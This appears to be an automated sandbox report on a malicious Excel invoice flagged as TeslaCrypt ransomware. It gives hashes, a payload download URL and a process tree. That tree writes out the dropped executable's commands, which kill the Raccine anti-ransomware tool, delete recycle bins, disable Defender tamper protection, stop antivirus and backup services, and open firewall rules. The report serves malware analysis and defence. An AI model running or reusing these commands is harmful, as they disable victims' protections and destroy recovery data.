Analysis
  max time kernel: 151s
  max time network: 93s
  platform: windows7_x64
  resource: win7v20201028
  submitted: 22/01/2021, 07:41
Static task: static1

Behavioral task: behavioral1
  Sample: invoice_NQ_Supply.xls
  Resource: win7v20201028

Behavioral task: behavioral2
  Sample: invoice_NQ_Supply.xls
  Resource: win10v20201028
General
  Target: invoice_NQ_Supply.xls
  Size: 83KB
  MD5: 50fecec126570e4b8fcd531d6711879a
  SHA1: 9166aee4a6815e4f67e0ae43344d8ca144958d47
  SHA256: c7e40628fb6beb52d9d73a3b3afd1dca5d2335713593b698637e1a47b42bfc71
  SHA512: 5f6d88626024811fd05af98d35a2e54a87ce5c8929d56c8bc49d718417b3370af7aa9a66c46007c600c5ec608a0f91f1e952738ee35cd3aebe28b4db46a2c042
Malware Config
  Extracted: C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
  Extracted: https://iffusedtrac.xyz/3/bbc.exe
Signatures

TeslaCrypt, AlphaCrypt
  Ransomware based on CryptoLocker. Shut down by the developers in 2016.

Executes dropped EXE (2 IoCs)
  pid   Process
  1052  GZTJoxx.exe
  560   wqm58yk7.exe

Modifies Windows Firewall (1 TTPs)

Drops startup file (1 IoCs)
  description   ioc   Process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk  wqm58yk7.exe

Loads dropped DLL (2 IoCs)
  pid   Process
  1856  EXCEL.EXE
  1052  GZTJoxx.exe

Windows security modification (2 IoCs)
  description      ioc   Process
  Key created      \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features  wqm58yk7.exe
  Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"  wqm58yk7.exe
Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

NSIS installer (6 IoCs)
  resource                                     yara_rule
  behavioral1/files/0x0004000000013105-6.dat   nsis_installer_1
  behavioral1/files/0x0004000000013105-6.dat   nsis_installer_2
  behavioral1/files/0x0004000000013105-8.dat   nsis_installer_1
  behavioral1/files/0x0004000000013105-8.dat   nsis_installer_2
  behavioral1/files/0x0004000000013105-10.dat  nsis_installer_1
  behavioral1/files/0x0004000000013105-10.dat  nsis_installer_2

Enumerates system info in registry (2 TTPs, 1 IoCs)
  description  ioc   Process
  Key opened   \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor  EXCEL.EXE

Kills process with taskkill (1 IoCs)
  pid  Process
  924  taskkill.exe

Modifies Internet Explorer settings (9 IoCs)
  description      ioc   Process
  Set value (int)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"  EXCEL.EXE
  Set value (int)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"  EXCEL.EXE
  Set value (str)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"  EXCEL.EXE
  Set value (str)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"  EXCEL.EXE
  Key created      \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote  EXCEL.EXE
  Key created      \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel  EXCEL.EXE
  Set value (str)  \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"  EXCEL.EXE
  Key created      \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar  EXCEL.EXE
  Key created      \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt  EXCEL.EXE

Modifies registry key (1 TTPs, 1 IoCs)
  pid   Process
  1620  reg.exe

Runs net.exe

Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  pid   Process
  1856  EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid  Process
  560  wqm58yk7.exe  (the same entry is repeated 64 times in the report)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description             pid   Process
  Token: SeDebugPrivilege  560   wqm58yk7.exe
  Token: SeDebugPrivilege  1580  powershell.exe
  Token: SeDebugPrivilege  924   taskkill.exe

Suspicious use of FindShellTrayWindow (1 IoCs)
  pid  Process
  560  wqm58yk7.exe

Suspicious use of SendNotifyMessage (1 IoCs)
  pid  Process
  560  wqm58yk7.exe

Suspicious use of SetWindowsHookEx (9 IoCs)
  pid   Process
  1856  EXCEL.EXE  (the same entry is repeated 9 times in the report)

Suspicious use of WriteProcessMemory (64 IoCs)
  Each row below is repeated four times in the report (16 distinct rows, 64 entries).
  description                         pid   Process         procid_target
  PID 1856 wrote to memory of 1052    1856  EXCEL.EXE       31
  PID 1052 wrote to memory of 560     1052  GZTJoxx.exe     33
  PID 560 wrote to memory of 1580     560   wqm58yk7.exe    35
  PID 560 wrote to memory of 924      560   wqm58yk7.exe    37
  PID 560 wrote to memory of 1156     560   wqm58yk7.exe    39
  PID 560 wrote to memory of 1620     560   wqm58yk7.exe    40
  PID 560 wrote to memory of 2016     560   wqm58yk7.exe    43
  PID 560 wrote to memory of 2020     560   wqm58yk7.exe    45
  PID 560 wrote to memory of 1752     560   wqm58yk7.exe    47
  PID 560 wrote to memory of 1868     560   wqm58yk7.exe    48
  PID 560 wrote to memory of 1356     560   wqm58yk7.exe    55
  PID 560 wrote to memory of 1136     560   wqm58yk7.exe    54
  PID 560 wrote to memory of 660      560   wqm58yk7.exe    52
  PID 560 wrote to memory of 1552     560   wqm58yk7.exe    57
  PID 560 wrote to memory of 1624     560   wqm58yk7.exe    59
  PID 560 wrote to memory of 1044     560   wqm58yk7.exe    81
Processes (child processes are indented under their parent)

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
  "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\invoice_NQ_Supply.xls
  PID: 1856
  - Loads dropped DLL
  - Enumerates system info in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\wCmfmRe\dtwzrQf\GZTJoxx.exe
    "C:\wCmfmRe\dtwzrQf\GZTJoxx.exe"
    PID: 1052
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe
      "C:\Users\Admin\AppData\Local\Programs\Temp\wqm58yk7.exe"
      PID: 560
      - Executes dropped EXE
      - Drops startup file
      - Windows security modification
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Get-MpPreference -verbose
        PID: 1580
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\taskkill.exe
        "taskkill" /F /IM RaccineSettings.exe
        PID: 924
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\reg.exe
        "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
        PID: 1156

      C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        PID: 1620
        - Modifies registry key

      C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        PID: 2016

      C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
        PID: 2020

      C:\Windows\SysWOW64\sc.exe
        "sc.exe" config Dnscache start= auto
        PID: 1752

      C:\Windows\SysWOW64\sc.exe
        "sc.exe" config SQLTELEMETRY start= disabled
        PID: 1868

      C:\Windows\SysWOW64\sc.exe
        "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
        PID: 660

      C:\Windows\SysWOW64\cmd.exe
        "cmd.exe" /c rd /s /q D:\\$Recycle.bin
        PID: 1136

      C:\Windows\SysWOW64\sc.exe
        "sc.exe" config FDResPub start= auto
        PID: 1356

      C:\Windows\SysWOW64\sc.exe
        "sc.exe" config SstpSvc start= disabled
        PID: 1552

      C:\Windows\SysWOW64\netsh.exe
        "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
        PID: 1624

      C:\Windows\SysWOW64\sc.exe
        "sc.exe" config upnphost start= auto
        PID: 936

      C:\Windows\SysWOW64\netsh.exe
        "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
        PID: 1264

      C:\Windows\SysWOW64\net.exe
        "net.exe" start Dnscache /y
        PID: 1376

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 start Dnscache /y
          PID: 2224

      C:\Windows\SysWOW64\sc.exe
        "sc.exe" config SQLWriter start= disabled
        PID: 1548

      C:\Windows\SysWOW64\net.exe
        "net.exe" start FDResPub /y
        PID: 820

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 start FDResPub /y
          PID: 2216

      C:\Windows\SysWOW64\net.exe
        "net.exe" start SSDPSRV /y
        PID: 324

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 start SSDPSRV /y
          PID: 2248

      C:\Windows\SysWOW64\net.exe
        "net.exe" stop mfewc /y
        PID: 1664

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop mfewc /y
          PID: 2276

      C:\Windows\SysWOW64\net.exe
        "net.exe" stop McAfeeDLPAgentService /y
        PID: 1380

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
          PID: 2256

      C:\Windows\SysWOW64\net.exe
        "net.exe" stop avpsus /y
        PID: 2024

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop avpsus /y
          PID: 2148

      C:\Windows\SysWOW64\net.exe
        "net.exe" stop bedbg /y
        PID: 1684

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop bedbg /y
          PID: 2240

      C:\Windows\SysWOW64\sc.exe
        "sc.exe" config SSDPSRV start= auto
        PID: 1044

      C:\Windows\SysWOW64\net.exe
        "net.exe" stop MSSQL$SQL_2008 /y
        PID: 436

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
          PID: 2208

      C:\Windows\SysWOW64\net.exe
        "net.exe" stop EhttpSrv /y
        PID: 800

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop EhttpSrv /y
          PID: 2268

      C:\Windows\SysWOW64\net.exe
        "net.exe" stop BMR Boot Service /y
        PID: 956

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop BMR Boot Service /y
          PID: 2156

      C:\Windows\SysWOW64\net.exe
        "net.exe" start upnphost /y
        PID: 1900

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 start upnphost /y
          PID: 2164

      C:\Windows\SysWOW64\net.exe
        "net.exe" stop ccEvtMgr /y
        PID: 2056

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop ccEvtMgr /y
          PID: 2184

      C:\Windows\SysWOW64\net.exe
        "net.exe" stop ccSetMgr /y
        PID: 2084

        C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop ccSetMgr /y
          PID: 2232

      C:\Windows\SysWOW64\net.exe
        "net.exe" stop NetBackup BMR MTFTP Service /y
        PID: 2112